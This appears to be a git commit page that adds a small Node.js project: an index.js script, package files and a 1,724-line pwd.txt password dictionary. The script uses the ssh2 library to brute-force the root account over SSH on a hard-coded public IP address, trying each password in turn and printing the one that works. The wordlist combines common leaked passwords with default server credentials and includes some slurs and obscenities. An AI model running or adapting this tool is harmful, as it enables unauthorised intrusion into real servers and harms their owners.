Browse Source

Signed-off-by: Caner <5658514@qq.com>

Caner 4 years ago
parent
commit
fb6aba01e5
4 changed files with 1932 additions and 0 deletions
  1. 45 0
      index.js
  2. 149 0
      package-lock.json
  3. 14 0
      package.json
  4. 1724 0
      pwd.txt

+ 45 - 0
index.js

@@ -0,0 +1,45 @@
+const { Client } = require('ssh2');
+const fs = require("fs");
+const fn = (config, pwd) => {
+    const option = {
+        ...config,
+        password: pwd || ''
+    }
+    return new Promise((res, rej) => {
+        const conn = new Client();
+        conn.connect(option)
+        conn.on('ready', res)
+        conn.on('error', rej)
+    })
+}
+
+class test {
+    constructor() {
+        // 字典集
+        const pwds = fs.readFileSync('./pwd.txt',{encoding:'utf-8'}).toString().split('\r\n')
+        // 基础配置
+        const config ={
+            host: '68.183.74.4',
+            port: 22,
+            username: 'root',
+        }
+        this.init(config,[...new Set(pwds)])
+    }
+
+    async init(config,pwds) {
+        console.log(pwds);
+        for (let k = 0; k < pwds.length; k++) {
+            const el = pwds[k]
+            try {
+                await fn(config,el)
+                console.log('成功', el);
+                break
+            } catch (error) {
+                console.log(k, '失败');
+            }
+
+        }
+    }
+}
+new test()
+

+ 149 - 0
package-lock.json

@@ -0,0 +1,149 @@
+{
+  "name": "ssh2",
+  "version": "1.0.0",
+  "lockfileVersion": 2,
+  "requires": true,
+  "packages": {
+    "": {
+      "name": "ssh2",
+      "version": "1.0.0",
+      "license": "ISC",
+      "dependencies": {
+        "ssh2": "^1.10.0"
+      }
+    },
+    "node_modules/asn1": {
+      "version": "0.2.6",
+      "resolved": "https://registry.npmmirror.com/asn1/-/asn1-0.2.6.tgz",
+      "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==",
+      "dependencies": {
+        "safer-buffer": "~2.1.0"
+      }
+    },
+    "node_modules/bcrypt-pbkdf": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmmirror.com/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz",
+      "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==",
+      "dependencies": {
+        "tweetnacl": "^0.14.3"
+      }
+    },
+    "node_modules/buildcheck": {
+      "version": "0.0.3",
+      "resolved": "https://registry.npmmirror.com/buildcheck/-/buildcheck-0.0.3.tgz",
+      "integrity": "sha512-pziaA+p/wdVImfcbsZLNF32EiWyujlQLwolMqUQE8xpKNOH7KmZQaY8sXN7DGOEzPAElo9QTaeNRfGnf3iOJbA==",
+      "optional": true,
+      "engines": {
+        "node": ">=10.0.0"
+      }
+    },
+    "node_modules/cpu-features": {
+      "version": "0.0.4",
+      "resolved": "https://registry.npmmirror.com/cpu-features/-/cpu-features-0.0.4.tgz",
+      "integrity": "sha512-fKiZ/zp1mUwQbnzb9IghXtHtDoTMtNeb8oYGx6kX2SYfhnG0HNdBEBIzB9b5KlXu5DQPhfy3mInbBxFcgwAr3A==",
+      "hasInstallScript": true,
+      "optional": true,
+      "dependencies": {
+        "buildcheck": "0.0.3",
+        "nan": "^2.15.0"
+      },
+      "engines": {
+        "node": ">=10.0.0"
+      }
+    },
+    "node_modules/nan": {
+      "version": "2.15.0",
+      "resolved": "https://registry.npmmirror.com/nan/-/nan-2.15.0.tgz",
+      "integrity": "sha512-8ZtvEnA2c5aYCZYd1cvgdnU6cqwixRoYg70xPLWUws5ORTa/lnw+u4amixRS/Ac5U5mQVgp9pnlSUnbNWFaWZQ==",
+      "optional": true
+    },
+    "node_modules/safer-buffer": {
+      "version": "2.1.2",
+      "resolved": "https://registry.npmmirror.com/safer-buffer/-/safer-buffer-2.1.2.tgz",
+      "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg=="
+    },
+    "node_modules/ssh2": {
+      "version": "1.10.0",
+      "resolved": "https://registry.npmmirror.com/ssh2/-/ssh2-1.10.0.tgz",
+      "integrity": "sha512-OnKAAmf4j8wCRrXXZv3Tp5lCZkLJZtgZbn45ELiShCg27djDQ3XFGvIzuGsIsf4hdHslP+VdhA9BhUQdTdfd9w==",
+      "hasInstallScript": true,
+      "dependencies": {
+        "asn1": "^0.2.4",
+        "bcrypt-pbkdf": "^1.0.2"
+      },
+      "engines": {
+        "node": ">=10.16.0"
+      },
+      "optionalDependencies": {
+        "cpu-features": "~0.0.4",
+        "nan": "^2.15.0"
+      }
+    },
+    "node_modules/tweetnacl": {
+      "version": "0.14.5",
+      "resolved": "https://registry.npmmirror.com/tweetnacl/-/tweetnacl-0.14.5.tgz",
+      "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA=="
+    }
+  },
+  "dependencies": {
+    "asn1": {
+      "version": "0.2.6",
+      "resolved": "https://registry.npmmirror.com/asn1/-/asn1-0.2.6.tgz",
+      "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==",
+      "requires": {
+        "safer-buffer": "~2.1.0"
+      }
+    },
+    "bcrypt-pbkdf": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmmirror.com/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz",
+      "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==",
+      "requires": {
+        "tweetnacl": "^0.14.3"
+      }
+    },
+    "buildcheck": {
+      "version": "0.0.3",
+      "resolved": "https://registry.npmmirror.com/buildcheck/-/buildcheck-0.0.3.tgz",
+      "integrity": "sha512-pziaA+p/wdVImfcbsZLNF32EiWyujlQLwolMqUQE8xpKNOH7KmZQaY8sXN7DGOEzPAElo9QTaeNRfGnf3iOJbA==",
+      "optional": true
+    },
+    "cpu-features": {
+      "version": "0.0.4",
+      "resolved": "https://registry.npmmirror.com/cpu-features/-/cpu-features-0.0.4.tgz",
+      "integrity": "sha512-fKiZ/zp1mUwQbnzb9IghXtHtDoTMtNeb8oYGx6kX2SYfhnG0HNdBEBIzB9b5KlXu5DQPhfy3mInbBxFcgwAr3A==",
+      "optional": true,
+      "requires": {
+        "buildcheck": "0.0.3",
+        "nan": "^2.15.0"
+      }
+    },
+    "nan": {
+      "version": "2.15.0",
+      "resolved": "https://registry.npmmirror.com/nan/-/nan-2.15.0.tgz",
+      "integrity": "sha512-8ZtvEnA2c5aYCZYd1cvgdnU6cqwixRoYg70xPLWUws5ORTa/lnw+u4amixRS/Ac5U5mQVgp9pnlSUnbNWFaWZQ==",
+      "optional": true
+    },
+    "safer-buffer": {
+      "version": "2.1.2",
+      "resolved": "https://registry.npmmirror.com/safer-buffer/-/safer-buffer-2.1.2.tgz",
+      "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg=="
+    },
+    "ssh2": {
+      "version": "1.10.0",
+      "resolved": "https://registry.npmmirror.com/ssh2/-/ssh2-1.10.0.tgz",
+      "integrity": "sha512-OnKAAmf4j8wCRrXXZv3Tp5lCZkLJZtgZbn45ELiShCg27djDQ3XFGvIzuGsIsf4hdHslP+VdhA9BhUQdTdfd9w==",
+      "requires": {
+        "asn1": "^0.2.4",
+        "bcrypt-pbkdf": "^1.0.2",
+        "cpu-features": "~0.0.4",
+        "nan": "^2.15.0"
+      }
+    },
+    "tweetnacl": {
+      "version": "0.14.5",
+      "resolved": "https://registry.npmmirror.com/tweetnacl/-/tweetnacl-0.14.5.tgz",
+      "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA=="
+    }
+  }
+}

+ 14 - 0
package.json

@@ -0,0 +1,14 @@
+{
+  "name": "ssh2",
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "ssh2": "^1.10.0"
+  }
+}

+ 1724 - 0
pwd.txt

@@ -0,0 +1,1724 @@
+123456
+password
+12345678
+qwerty
+123456789
+12345
+1234
+111111
+1234567
+dragon
+123123
+baseball
+abc123
+football
+monkey
+letmein
+696969
+shadow
+master
+666666
+qwertyuiop
+123321
+mustang
+1234567890
+michael
+654321
+pussy
+superman
+1qaz2wsx
+7777777
+fuckyou
+121212
+000000
+qazwsx
+123qwe
+killer
+trustno1
+jordan
+jennifer
+zxcvbnm
+asdfgh
+hunter
+buster
+soccer
+harley
+batman
+andrew
+tigger
+sunshine
+iloveyou
+fuckme
+2000
+charlie
+robert
+thomas
+hockey
+ranger
+daniel
+starwars
+klaster
+112233
+george
+asshole
+computer
+michelle
+jessica
+pepper
+1111
+zxcvbn
+555555
+11111111
+131313
+freedom
+777777
+pass
+fuck
+maggie
+159753
+aaaaaa
+ginger
+princess
+joshua
+cheese
+amanda
+summer
+love
+ashley
+6969
+nicole
+chelsea
+biteme
+matthew
+access
+yankees
+987654321
+dallas
+austin
+thunder
+taylor
+matrix
+william
+corvette
+hello
+martin
+heather
+secret
+fucker
+merlin
+diamond
+1234qwer
+gfhjkm
+hammer
+silver
+222222
+88888888
+anthony
+justin
+test
+bailey
+q1w2e3r4t5
+patrick
+internet
+scooter
+orange
+11111
+golfer
+cookie
+richard
+samantha
+bigdog
+guitar
+jackson
+whatever
+mickey
+chicken
+sparky
+snoopy
+maverick
+phoenix
+camaro
+sexy
+peanut
+morgan
+welcome
+falcon
+cowboy
+ferrari
+samsung
+andrea
+smokey
+steelers
+joseph
+mercedes
+dakota
+arsenal
+eagles
+melissa
+boomer
+booboo
+spider
+nascar
+monster
+tigers
+yellow
+xxxxxx
+123123123
+gateway
+marina
+diablo
+bulldog
+qwer1234
+compaq
+purple
+hardcore
+banana
+junior
+hannah
+123654
+porsche
+lakers
+iceman
+money
+cowboys
+987654
+london
+tennis
+999999
+ncc1701
+coffee
+scooby
+0000
+miller
+boston
+q1w2e3r4
+fuckoff
+brandon
+yamaha
+chester
+mother
+forever
+johnny
+edward
+333333
+oliver
+redsox
+player
+nikita
+knight
+fender
+barney
+midnight
+please
+brandy
+chicago
+badboy
+iwantu
+slayer
+rangers
+charles
+angel
+flower
+bigdaddy
+rabbit
+wizard
+bigdick
+jasper
+enter
+rachel
+chris
+steven
+winner
+adidas
+victoria
+natasha
+1q2w3e4r
+jasmine
+winter
+prince
+panties
+marine
+ghbdtn
+fishing
+cocacola
+casper
+james
+232323
+raiders
+888888
+marlboro
+gandalf
+asdfasdf
+crystal
+87654321
+12344321
+sexsex
+golden
+blowme
+bigtits
+8675309
+panther
+lauren
+angela
+bitch
+spanky
+thx1138
+angels
+madison
+winston
+shannon
+mike
+toyota
+blowjob
+jordan23
+canada
+sophie
+Password
+apples
+dick
+tiger
+razz
+123abc
+pokemon
+qazxsw
+55555
+qwaszx
+muffin
+johnson
+murphy
+cooper
+jonathan
+liverpoo
+david
+danielle
+159357
+jackie
+1990
+123456a
+789456
+turtle
+horny
+abcd1234
+scorpion
+qazwsxedc
+101010
+butter
+carlos
+password1
+dennis
+slipknot
+qwerty123
+booger
+asdf
+1991
+black
+startrek
+12341234
+cameron
+newyork
+rainbow
+nathan
+john
+1992
+rocket
+viking
+redskins
+butthead
+asdfghjkl
+1212
+sierra
+peaches
+gemini
+doctor
+wilson
+sandra
+helpme
+qwertyui
+victor
+florida
+dolphin
+pookie
+captain
+tucker
+blue
+liverpool
+theman
+bandit
+dolphins
+maddog
+packers
+jaguar
+lovers
+nicholas
+united
+tiffany
+maxwell
+zzzzzz
+nirvana
+jeremy
+suckit
+stupid
+porn
+monica
+elephant
+giants
+jackass
+hotdog
+rosebud
+success
+debbie
+mountain
+444444
+xxxxxxxx
+warrior
+1q2w3e4r5t
+q1w2e3
+123456q
+albert
+metallic
+lucky
+azerty
+7777
+shithead
+alex
+bond007
+alexis
+1111111
+samson
+5150
+willie
+scorpio
+bonnie
+gators
+benjamin
+voodoo
+driver
+dexter
+2112
+jason
+calvin
+freddy
+212121
+creative
+12345a
+sydney
+rush2112
+1989
+asdfghjk
+red123
+bubba
+4815162342
+passw0rd
+trouble
+gunner
+happy
+fucking
+gordon
+legend
+jessie
+stella
+qwert
+eminem
+arthur
+apple
+nissan
+bullshit
+bear
+america
+1qazxsw2
+nothing
+parker
+4444
+rebecca
+qweqwe
+garfield
+01012011
+beavis
+69696969
+jack
+asdasd
+december
+2222
+102030
+252525
+11223344
+magic
+apollo
+skippy
+315475
+girls
+kitten
+golf
+copper
+braves
+shelby
+godzilla
+beaver
+fred
+tomcat
+august
+buddy
+airborne
+1993
+1988
+lifehack
+qqqqqq
+brooklyn
+animal
+platinum
+phantom
+online
+xavier
+darkness
+blink182
+power
+fish
+green
+789456123
+voyager
+police
+travis
+12qwaszx
+heaven
+snowball
+lover
+abcdef
+00000
+pakistan
+007007
+walter
+playboy
+blazer
+cricket
+sniper
+hooters
+donkey
+willow
+loveme
+saturn
+therock
+redwings
+bigboy
+pumpkin
+trinity
+williams
+tits
+nintendo
+digital
+destiny
+topgun
+runner
+marvin
+guinness
+chance
+bubbles
+testing
+fire
+november
+minecraft
+asdf1234
+lasvegas
+sergey
+broncos
+cartman
+private
+celtic
+birdie
+little
+cassie
+babygirl
+donald
+beatles
+1313
+dickhead
+family
+12121212
+school
+louise
+gabriel
+eclipse
+fluffy
+147258369
+lol123
+explorer
+beer
+nelson
+flyers
+spencer
+scott
+lovely
+gibson
+doggie
+cherry
+andrey
+snickers
+buffalo
+pantera
+metallica
+member
+carter
+qwertyu
+peter
+alexande
+steve
+bronco
+paradise
+goober
+5555
+samuel
+montana
+mexico
+dreams
+michigan
+cock
+carolina
+yankee
+friends
+magnum
+surfer
+poopoo
+maximus
+genius
+cool
+vampire
+lacrosse
+asd123
+aaaa
+christin
+kimberly
+speedy
+sharon
+carmen
+111222
+kristina
+sammy
+racing
+ou812
+sabrina
+horses
+0987654321
+qwerty1
+pimpin
+baby
+stalker
+enigma
+147147
+star
+poohbear
+boobies
+147258
+simple
+bollocks
+12345q
+marcus
+brian
+1987
+qweasdzxc
+drowssap
+hahaha
+caroline
+barbara
+dave
+viper
+drummer
+action
+einstein
+bitches
+genesis
+hello1
+scotty
+friend
+forest
+010203
+hotrod
+google
+vanessa
+spitfire
+badger
+maryjane
+friday
+alaska
+1232323q
+tester
+jester
+jake
+champion
+billy
+147852
+rock
+hawaii
+badass
+chevy
+420420
+walker
+stephen
+eagle1
+bill
+1986
+october
+gregory
+svetlana
+pamela
+1984
+music
+shorty
+westside
+stanley
+diesel
+courtney
+242424
+kevin
+porno
+hitman
+boobs
+mark
+12345qwert
+reddog
+frank
+qwe123
+popcorn
+patricia
+aaaaaaaa
+1969
+teresa
+mozart
+buddha
+anderson
+paul
+melanie
+abcdefg
+security
+lucky1
+lizard
+denise
+3333
+a12345
+123789
+ruslan
+stargate
+simpsons
+scarface
+eagle
+123456789a
+thumper
+olivia
+naruto
+1234554321
+general
+cherokee
+a123456
+vincent
+Usuckballz1
+spooky
+qweasd
+cumshot
+free
+frankie
+douglas
+death
+1980
+loveyou
+kitty
+kelly
+veronica
+suzuki
+semperfi
+penguin
+mercury
+liberty
+spirit
+scotland
+natalie
+marley
+vikings
+system
+sucker
+king
+allison
+marshall
+1979
+098765
+qwerty12
+hummer
+adrian
+1985
+vfhbyf
+sandman
+rocky
+leslie
+antonio
+98765432
+4321
+softball
+passion
+mnbvcxz
+bastard
+passport
+horney
+rascal
+howard
+franklin
+bigred
+assman
+alexander
+homer
+redrum
+jupiter
+claudia
+55555555
+141414
+zaq12wsx
+shit
+patches
+nigger
+cunt
+raider
+infinity
+andre
+54321
+galore
+college
+russia
+kawasaki
+bishop
+77777777
+vladimir
+money1
+freeuser
+wildcats
+francis
+disney
+budlight
+brittany
+1994
+00000000
+sweet
+oksana
+honda
+domino
+bulldogs
+brutus
+swordfis
+norman
+monday
+jimmy
+ironman
+ford
+fantasy
+9999
+7654321
+PASSWORD
+hentai
+duncan
+cougar
+1977
+jeffrey
+house
+dancer
+brooke
+timothy
+super
+marines
+justice
+digger
+connor
+patriots
+karina
+202020
+molly
+everton
+tinker
+alicia
+rasdzv3
+poop
+pearljam
+stinky
+naughty
+colorado
+123123a
+water
+test123
+ncc1701d
+motorola
+ireland
+asdfg
+slut
+matt
+houston
+boogie
+zombie
+accord
+vision
+bradley
+reggie
+kermit
+froggy
+ducati
+avalon
+6666
+9379992
+sarah
+saints
+logitech
+chopper
+852456
+simpson
+madonna
+juventus
+claire
+159951
+zachary
+yfnfif
+wolverin
+warcraft
+hello123
+extreme
+penis
+peekaboo
+fireman
+eugene
+brenda
+123654789
+russell
+panthers
+georgia
+smith
+skyline
+jesus
+elizabet
+spiderma
+smooth
+pirate
+empire
+bullet
+8888
+virginia
+valentin
+psycho
+predator
+arizona
+134679
+mitchell
+alyssa
+vegeta
+titanic
+christ
+goblue
+fylhtq
+wolf
+mmmmmm
+kirill
+indian
+hiphop
+baxter
+awesome
+people
+danger
+roland
+mookie
+741852963
+1111111111
+dreamer
+bambam
+arnold
+1981
+skipper
+serega
+rolltide
+elvis
+changeme
+simon
+1q2w3e
+lovelove
+fktrcfylh
+denver
+tommy
+mine
+loverboy
+hobbes
+happy1
+alison
+nemesis
+chevelle
+cardinal
+burton
+wanker
+picard
+151515
+tweety
+michael1
+147852369
+12312
+xxxx
+windows
+turkey
+456789
+1974
+vfrcbv
+sublime
+1975
+galina
+bobby
+newport
+manutd
+daddy
+american
+alexandr
+1966
+victory
+rooster
+qqq111
+madmax
+electric
+bigcock
+a1b2c3
+wolfpack
+spring
+phpbb
+lalala
+suckme
+spiderman
+eric
+darkside
+classic
+raptor
+123456789q
+hendrix
+1982
+wombat
+avatar
+alpha
+zxc123
+crazy
+hard
+england
+brazil
+1978
+01011980
+wildcat
+polina
+freepass
+123456
+123456789
+123123
+111111
+anhyeuem
+1234567
+123456789
+123456
+12345678
+000000
+asdasd
+25251325
+1234567890
+121212
+123321
+zxcvbnm
+qweqwe
+456789
+112233
+aaaaaa
+123123123
+987654321
+11111111
+qwerty
+147258369
+maiyeuem
+123qwe
+654321
+iloveyou
+123654
+999999
+qqqqqq
+1111111
+147258
+hota407
+anhtuan
+222222
+159753
+11223344
+anhnhoem
+anh123
+159357
+qwertyuiop
+asd123
+987654321
+emyeuanh
+mmmmmm
+12345
+666666
+anhanh
+123789
+phuong
+111222
+qweasd
+hanoiyeudau
+nguyen
+789456
+1111111111
+mylove
+789456123
+19001560
+qwe123
+asdfghjkl
+pppppp
+anhhung
+1234560
+abc123
+maiyeu
+123456a
+zzzzzz
+quangninh
+987654
+555555
+tuananh
+asasas
+asdfgh
+zxcvbn
+321321
+tinhyeu
+147852369
+456123
+matkhau
+147852
+12345678910
+thienthan
+anhyeu
+111111111
+toilatoi
+10cham0
+147258369
+456456
+khongbiet
+789789
+a123456
+333333
+888888
+123654789
+truong
+maimaiyeuem
+hhhhhh
+PublishThisListPlease
+root
+!@
+wubao
+password
+123456
+admin
+12345
+1234
+p@ssw0rd
+123
+1
+jiamima
+test
+root123
+!
+!q@w
+!qaz@wsx
+idc!@
+admin!@
+
+alpine
+qwerty
+12345678
+111111
+123456789
+1q2w3e4r
+123123
+default
+1234567
+qwe123
+1qaz2wsx
+1234567890
+abcd1234
+000000
+user
+toor
+qwer1234
+1q2w3e
+asdf1234
+redhat
+1234qwer
+cisco
+12qwaszx
+test123
+1q2w3e4r5t
+admin123
+changeme
+1qazxsw2
+123qweasd
+q1w2e3r4
+letmein
+server
+root1234
+master
+abc123
+rootroot
+a
+system
+pass
+1qaz2wsx3edc
+p@$$w0rd
+112233
+welcome
+!QAZ2wsx
+linux
+123321
+manager
+1qazXSW@
+q1w2e3r4t5
+oracle
+asd123
+admin123456
+ubnt
+123qwe
+qazwsxedc
+administrator
+superuser
+zaq12wsx
+121212
+654321
+ubuntu
+0000
+zxcvbnm
+root@123
+1111
+vmware
+q1w2e3
+qwerty123
+cisco123
+11111111
+pa55w0rd
+asdfgh
+11111
+123abc
+asdf
+centos
+888888
+54321
+password123
+123456789
+a123456
+123456
+a123456789
+1234567890
+woaini1314
+qq123456
+abc123456
+123456a
+123456789a
+147258369
+zxcvbnm
+987654321
+12345678910
+abc123
+qq123456789
+123456789.
+7708801314520
+woaini
+5201314520
+q123456
+123456abc
+1233211234567
+123123123
+123456.
+0123456789
+asd123456
+aa123456
+135792468
+q123456789
+abcd123456
+12345678900
+woaini520
+woaini123
+zxcvbnm123
+1111111111111111
+w123456
+aini1314
+abc123456789
+111111
+woaini521
+qwertyuiop
+1314520520
+1234567891
+qwe123456
+asd123
+000000
+1472583690
+1357924680
+789456123
+123456789abc
+z123456
+1234567899
+aaa123456
+abcd1234
+www123456
+123456789q
+123abc
+qwe123
+w123456789
+7894561230
+123456qq
+zxc123456
+123456789qq
+1111111111
+111111111
+0000000000000000
+1234567891234567
+qazwsxedc
+qwerty
+123456..
+zxc123
+asdfghjkl
+0000000000
+1234554321
+123456q
+123456aa
+9876543210
+110120119
+qaz123456
+qq5201314
+123698745
+5201314
+000000000
+as123456
+123123
+5841314520
+z123456789
+52013145201314
+a123123
+caonima
+a5201314
+wang123456
+abcd123
+123456789..
+woaini1314520
+123456asd
+aa123456789
+741852963
+a12345678
+12345
+123456
+123456789
+test1
+password
+12345678
+zinch
+g_czechout
+asdf
+qwerty
+1234567890
+1234567
+Aa123456.
+iloveyou
+1234
+abc123
+111111
+123123
+dubsmash
+test
+princess
+qwertyuiop
+sunshine
+BvtTest123
+11111
+ashley
+00000
+000000
+password1
+monkey
+livetest
+55555
+soccer
+charlie
+asdfghjkl
+654321
+family
+michael
+123321
+football
+baseball
+q1w2e3r4t5y6
+nicole
+jessica
+purple
+shadow
+hannah
+chocolate
+michelle
+daniel
+maggie
+qwerty123
+hello
+112233
+jordan
+tigger
+666666
+987654321
+superman
+12345678910
+summer
+1q2w3e4r5t
+fitness
+bailey
+zxcvbnm
+fuckyou
+121212
+buster
+butterfly
+dragon
+jennifer
+amanda
+justin
+cookie
+basketball
+shopping
+pepper
+joshua
+hunter
+ginger
+matthew
+abcd1234
+taylor
+samantha
+whatever
+andrew
+1qaz2wsx3edc
+thomas
+jasmine
+animoto
+madison
+0987654321
+54321
+flower
+Password
+maria
+babygirl
+lovely
+sophie
+Chegg123
+123456
+password
+12345678
+qwerty
+12345
+123456789
+letmein
+1234567
+football
+iloveyou
+admin
+welcome
+monkey
+login
+abc123
+starwars
+123123
+dragon
+passw0rd
+master
+hello
+freedom
+whatever
+qazwsx
+trustnol
+654321
+jordan23
+harley
+password1
+1234
+robert
+mathew
+jordan
+asshole
+daniel
+andrew
+lakers
+andrea
+buster
+joshua
+1qaz2wsx
+12341234
+ferrari
+cheese
+computer
+corvette
+blahblah
+george
+mercedes
+121212
+maverick
+fuckyou
+nicole
+hunter
+sunshine
+tigger
+1989
+merlin
+ranger
+solo
+banana
+chelsea
+summer
+1990
+phoenix
+amanda
+cookie
+ashley
+bandit
+killer
+aaaaaa
+pepper
+jessica
+zaq1zaq1
+jennifer
+test
+hockey
+dallas
+passwor
+michelle
+admin123
+pussy
+pass
+asdf
+william
+soccer
+london
+1q2w3e
+1992
+biteme
+maggie
+querty
+rangers
+charlie
+martin
+ginger
+golfer
+yankees
+thunder
+123456
+12345679
+qwerty
+12345678
+111111
+1234567890
+1234567
+password
+123123
+987654321
+qwertyuiop
+mynoob
+123321
+666666
+18atcskd2w
+7777777
+1q2w3e4r
+654321
+555555
+3rjs1la7qe
+google
+1q2w3e4r5t
+123qwe
+zxcvbnm
+1q2w3e
+123456
+password
+123456789
+12345678
+12345
+111111
+1234567
+sunshine
+qwerty
+iloveyou
+princess
+admin
+welcome
+666666
+abc123
+football
+123123
+monkey
+654321
+!@#$%^&*
+charlie
+aa123456
+donald
+password1
+qwerty123
+123456
+password
+12345678
+qwerty
+12345
+123456789
+letmein
+1234567
+football
+iloveyou
+admin
+welcome
+monkey
+login
+abc123
+starwars
+123123
+dragon
+passw0rd
+master
+hello
+freedom
+whatever
+qazwsx
+trustno1
+123456
+password
+12345
+12345678
+football
+qwerty
+1234567890
+1234567
+princess
+1234
+login
+welcome
+solo
+abc123
+admin
+121212
+flower
+passw0rd
+dragon
+sunshine
+master
+hottie
+loveme
+zaq1zaq1
+password1
+123456
+password
+12345678
+qwerty
+12345
+123456789
+football
+1234
+1234567
+baseball
+welcome
+1234567890
+abc123
+111111
+1qaz2wsx
+dragon
+master
+monkey
+letmein
+login
+princess
+qwertyuiop
+solo
+passw0rd
+starwars
+123456
+password
+12345
+12345678
+qwerty
+123456789
+1234
+baseball
+dragon
+football
+1234567
+monkey
+letmein
+abc123
+111111
+mustang
+access
+shadow
+master
+michael
+superman
+696969
+123123
+batman
+trustno1
+123456
+password
+12345678
+qwerty
+abc123
+123456789
+111111
+1234567
+iloveyou
+adobe123
+123123
+admin
+1234567890
+letmein
+photoshop
+1234
+monkey
+shadow
+sunshine
+12345
+password1
+princess
+azerty
+trustno1
+000000
+password
+123456
+12345678
+abc123
+qwerty
+monkey
+letmein
+dragon
+111111
+baseball
+iloveyou
+trustno1
+1234567
+sunshine
+master
+123123
+welcome
+shadow
+ashley
+football
+jesus
+michael
+ninja
+mustang
+password1
+password
+123456
+12345678
+qwerty
+abc123
+monkey
+1234567
+letmein
+trustno1
+dragon
+baseball
+111111
+iloveyou
+master
+sunshine
+ashley
+bailey
+passw0rd
+shadow
+123123
+654321
+superman
+qazwsx
+michael
+Football